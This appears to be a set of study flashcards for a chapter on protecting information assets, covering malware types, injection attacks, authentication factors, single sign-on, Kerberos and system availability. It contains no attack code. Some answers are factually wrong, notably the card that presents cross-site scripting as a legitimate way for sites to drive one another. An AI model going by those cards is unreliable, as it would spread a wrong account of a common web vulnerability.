Ch.16 - Protecting Information Assets Flashcards

1
Q

What is Malicious Software?

A
- Software that:
• Causes damage
• Escalates security privileges
• Divulges private data
• Modifies or deletes data
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Malicious Software (malware)

A

Any program that carries out actions that you do not intend

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Malicious Code and Activity

A
  • Malicious code attacks all three information security properties:
    o Confidentiality: Disclose your org’s private info
    o Integrity: Modify database records – immediately or over period of time
    o Availability: Erase/overwrite files or inflict considerable damage to storage media
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Virus

A

Attaches itself to or copies itself into another program on computer
• Tricks computer into following instructions not intended by original program developer
• Infects host program and may cause that host program to replicate itself to other computers
• User who runs infected program authenticates the virus

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Trojan Horse

A

Malware that masquerades as useful program
• Hide programs that collect sensitive information
• Open backdoors into computers
• Actively upload and download files

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Rootkit

A

Modifies/replaces one or more existing programs to hide traces of attacks
• Many different types of rootkits
• Conceals its existence once installed
• Is difficult to detect and remove

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Spyware

A

Type of malware that specifically threatens confidentiality of info
• Monitors keystrokes
• Scans files on the hard drive
• Snoops other applications
• Installs other spyware programs
• Reads cookies
• Changes default homepage on the web browser

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Ransomware

A

Attempts to generate funds directly from computer user
• Attacks a computer and limits the user’s ability to access the computer’s data
• Encrypts important files or even the entire disk and makes them inaccessible
• One of the first ransomware programs was Crypt0L0cker

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Spam

A

Mass mailing of identical messages to large number of users
• Consumes computing resources bandwidth and CPU time
• Diverts IT personnel from activities more critical to network security
• Is potential carrier of malicious code
• Compromises intermediate systems to facilitate remailing services
• Opt-out (unsubscribe) features in spam messages can represent new form of reconnaissance attack to acquire legitimate target addresses

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Worms

A

Designed to propagate from one host machine to another using host’s own network
communications protocols
• Unlike viruses, do not require host program to survive and replicate
• Term “worm” stems from the fact that worms are programs with segments, working on
different computers, all communicating over a network

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Logic Bombs

A

Programs that execute malicious function of some kind when detect certain conditions
• Typically originate with org insiders because people inside org generally have more detailed knowledge of IT infrastructure than outsiders

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
12
Q

Injection

A
Insert into computer/program
• Cross-site scripting (XSS)
• SQL injection
• LDAP injection
• XML injection
• Command injection
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
13
Q

XSS and SQL Injection

A

Attack public-facing servers

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
14
Q

Cross-site scripting (XSS)

A

Programming technique enabling one website, such as a shopping cart, to drive another website
• Shopping cart sends approval msg to different website – Provides access or file to download
o It’s how Digital River, Microsoft online sales, Apple iTunes, eBay, PayPal, and all airline ticket sales operate
• Most cross‐site scripting implementations are poorly executed, use ineffective homegrown programming, or lack cryptographic authentication that is always required

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
15
Q

SQL injection

A

One of the most fundamental techniques for integrating different computer programs is
remote data submission – Entire computing world depends on info kept in database
• Data requests sent from untrusted sources can use command-line instructions to read database,
modify data using insert/delete, or change shopping cart price from $195.00 to $1.95 (ex)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
16
Q

Logical Access Control Solutions

A

Biometrics
Tokens
Passwords
Single Sign-On (SSO)

17
Q

Biometrics

A

▪ Static: Fingerprints, iris granularity, retina blood vessels, facial features, and hand geometry
▪ Dynamic: Voice inflections, keyboard strokes, and signature motions

18
Q

Tokens

A

▪ Synchronous or asynchronous

▪ Smart cards and memory cards

19
Q

Passwords

A

▪ Stringent password controls for users
▪ Account lockout policies
▪ Auditing logon events

20
Q

Single Sign-On (SSO)

A

▪ Kerberos process

▪ Secure European System for Applications in a Multi Vendor Environment (SESAME)

21
Q

Authentication Types

A
Knowledge
Ownership
Characteristics (Biometrics)
Location
Action
22
Q

Knowledge

A
Something you know
o Password
▪ Weak passwords easily cracked by brute-force or dictionary attack
▪ Password best practices
o Passphrase
▪ Stronger than password
23
Q

Ownership

A
Something you have
o Synchronous token—Calculates number at both authentication server and device
▪ Time-based synchronization system
▪ Event-based synchronization system
▪ Continuous authentication
o Asynchronous token
▪ USB token
▪ Smart card
▪ Memory cards (magnetic stripe)
o Asynchronous Token Challenge-Response
24
Q

Characteristics (Biometrics)

A
Something unique to you
o Static (physiological) measures: What you are
o Dynamic (behavioral) measures: What you do
o Concerns Surrounding Biometrics
▪ Accuracy/Acceptability/Reaction time
o Types of Biometrics:
▪ Fingerprint
▪ Palm print
▪ Hand geometry
▪ Retina scan
▪ Iris scan
▪ Facial recognition
▪ Voice pattern
▪ Keystroke dynamics
▪ Signature dynamics

o Privacy Issues:
▪ Biometric technologies don’t just involve collecting data about person
▪ Biometrics collects info intrinsic to people – Every person must submit to an examination, and that examination must be digitally recorded and stored
• Unauthorized access to this data could lead to misuse

25
Q

Location

A

Somewhere you are
o Strong indicator of authenticity
o Additional information to suggest granting/denying access to resource

26
Q

Action

A

Something you do/how you do it
o Stores patterns/nuances of how you do something
o Record typing patterns

27
Q

Single Sign-On (SSO)

A
  • Sign on to computer/network once
  • Identification/authorization credentials allow user to access all authorized computers/systems
  • Reduces human error
  • Difficult to put in place
28
Q

SSO Processes

A
  • Kerberos
  • Secure European System for Applications in a Multi-Vendor Environment (SESAME)
  • Lightweight Directory Access Protocol (LDAP)
29
Q

Kerberos

A

1) User authenticates to Kerberos workstation software
a. Authentication may be password or biometric method
2) Workstation software authenticates to Kerberos server
3) Shared encryption keys are used
a. A network access ticket is created by Kerberos
4) Kerberos access ticket sent to workstation and signed with workstation’s shared encryption key
a. All network servers receive similar ticket granting workstation access to shared servers
5) User is automatically signed in to all servers

30
Q

Identifying Activities for Systems Availability

A

• Activities:
o System Access
o System Availability
o System Functions: Manual and Automated
• Eliminate single points of failure (SPOF)
o Part of system that can cause entire system to fail
o If SPOF fails, entire system fails

31
Q

System Access and Availability

A
  • Goal = 99.999% up time
  • Failover cluster
  • RAID